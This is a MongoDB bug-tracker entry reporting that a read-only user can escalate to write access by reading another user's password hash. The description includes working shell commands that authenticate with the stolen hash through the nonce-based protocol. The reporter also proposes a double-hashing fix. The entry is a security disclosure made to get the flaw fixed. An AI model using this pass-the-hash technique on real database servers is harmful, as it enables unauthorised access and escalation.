[SERVER-6031] read only user can get write priority Created: 07/Jun/12 Updated: 15/Aug/12 Resolved: 12/Jun/12 |
|
| Status: | Closed |
| Project: | Core Server |
| Component/s: | Security |
| Affects Version/s: | None |
| Fix Version/s: | None |
| Type: | Bug | Priority: | Critical - P2 |
| Reporter: | xie zhenye | Assignee: | Unassigned |
| Resolution: | Duplicate | Votes: | 0 |
| Labels: | None | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original Estimate: | Not Specified | ||
| Environment: |
all |
||
| Issue Links: |
|
||||||||
| Operating System: | ALL | ||||||||
| Participants: | |||||||||
| Description |
|
read only user can get write priority by access other users's pwd hash sample: > db.$cmd.findOne( {getnonce:1}) { "nonce" : "9892be9572e9851e", "ok" : 1 }> db.runCommand( { authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") }) { "ok" : 1 } |
| Comments |
| Comment by Eliot Horowitz (Inactive) [ 12/Jun/12 ] |
|
|
| Comment by Spencer Brody (Inactive) [ 07/Jun/12 ] |
|
Confirmed and reproduced. |
| Comment by xie zhenye [ 07/Jun/12 ] |
|
the protocol of authentication only hash the password once. it need hash twice to be securer, like sha1(sha1(user+salt+password)). and the client should send sha1(user+salt+password) to do the authentication. |